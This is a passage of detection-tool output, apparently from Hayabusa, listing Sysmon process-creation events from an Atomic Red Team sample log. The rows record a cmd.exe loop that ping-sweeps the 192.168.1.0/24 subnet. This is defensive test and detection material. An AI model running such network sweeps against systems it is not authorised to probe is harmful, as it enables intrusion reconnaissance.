192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process 